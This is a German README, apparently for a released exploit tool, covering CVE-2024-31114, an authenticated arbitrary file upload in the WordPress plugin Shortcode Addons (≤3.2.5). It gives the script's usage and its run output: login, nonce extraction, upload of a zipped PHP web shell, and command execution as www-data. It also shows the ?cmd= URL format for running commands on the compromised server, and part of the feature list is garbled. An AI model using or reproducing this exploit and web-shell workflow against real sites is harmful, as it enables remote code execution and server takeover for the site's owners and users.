
Shortcode Addons <= 3.2.5 - Authentifiziert (Admin+) beliebiger Datei-Upload
Shortcode Addons <= 3.2.5 – Authentifizierter (Admin+) Upload beliebiger Dateien
CVE-ID: CVE-2024-31114
CVSS-Score: 9.1 (Kritisch)
Das Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension-Plugin für WordPress ist aufgrund fehlender Dateityp-Validierung in allen Versionen bis einschließlich 3.2.5 anfällig für das Hochladen beliebiger Dateien.
Diese Schwachstelle ermöglicht es authentifizierten Angreifern mit Administratorzugriff oder höher, beliebige Dateien auf den Server hochzuladen – was zu Remote Code Execution (RCE) führen kann.
Dieses Python-Skript automatisiert die Ausnutzung der Schwachstelle. Es führt Folgendes aus:
_wpnonce)nxploit.php).zipwhoami auf dem Zielserverusage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target URL (e.g. http://target.com)
-un, --username USERNAME WordPress Admin Username
-p, --password PASSWORD WordPress Admin Password
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
Sobald die Payload hochgeladen wurde, können Sie Systembefehle im folgenden Format ausführen:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
🔹 Beispiel:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
Dies listet den Inhalt des aktuellen Verzeichnisses auf dem Server auf.
Dieses Tool dient ausschließlich zu Schulungs- und autorisierten Testzwecken.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.
Verwenden Sie es verantwortungsvoll und nur auf Systemen, für die Sie die ausdrückliche Erlaubnis zum Testen haben.
Von: Nxploited | Khaled Alenazi